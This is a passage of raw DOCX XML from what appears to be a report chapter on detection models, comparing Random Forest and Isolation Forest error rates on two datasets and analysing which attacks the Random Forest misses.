          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_1_rf_if_forensics.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>), which refits all three models and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">keeps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> test-row prediction rather than the 40-row samples in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_failures.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The two models fail in different currencies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before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>recall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Random Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2210</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>207</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.796</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.728</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.034</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Random Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1362</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>145</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>334</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.753</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.697</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.052</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Isolation Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2269</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>651</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.146</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Isolation Forest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1422</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>441</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.079</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Random Forest trades recall for precision, and the trade only pays on one</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpus. On Dataset 1 it returns the lowest false-positive rate of any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>supervised model in the project (0.034, against the hybrid's 0.042 and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>XGBoost's 0.072) and buys it by missing 27% of the attacks. On Dataset 2 the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>advantage evaporates: at 0.052 it is no longer the most conservative — the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>hybrid (0.049) and the TF-IDF baseline (0.040) both run cleaner — while it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>still misses 30% of the attacks. The conservatism is a property of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>curated corpus, not of the model, which is the first hint that Chapter 8.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>should cascade rather than simply ship the Random Forest. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Isolation Forest is not making the same trade more aggressively — it is doing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>something different. It never saw a malicious label, so its errors are not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>mistakes about attacks but disagreements about what "normal" covers, and at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shipped fixed-0.5 threshold it sits in an extreme-precision corner (Chapter 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shows this is threshold placement, not ranking quality: ROC-AUC 0.812 / 0.677).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What the Random Forest misses is not a modelling failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The natural assumption is that 207 missed attacks represent capacity the model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>lacks. Measuring them says otherwise. Comparing the missed attacks against the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attacks the same model caught, the misses are displaced *toward the benign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>mean* on every feature that carries signal. Two columns quantify that: `z vs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>caught` is the gap in units of the caught-attack standard deviation, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rescales each feature so **0 = the benign mean and 1 = the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>caught-attack mean**, which puts all eight on one comparable axis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dataset 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the eight features on which the misses look most benign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feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>z vs caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
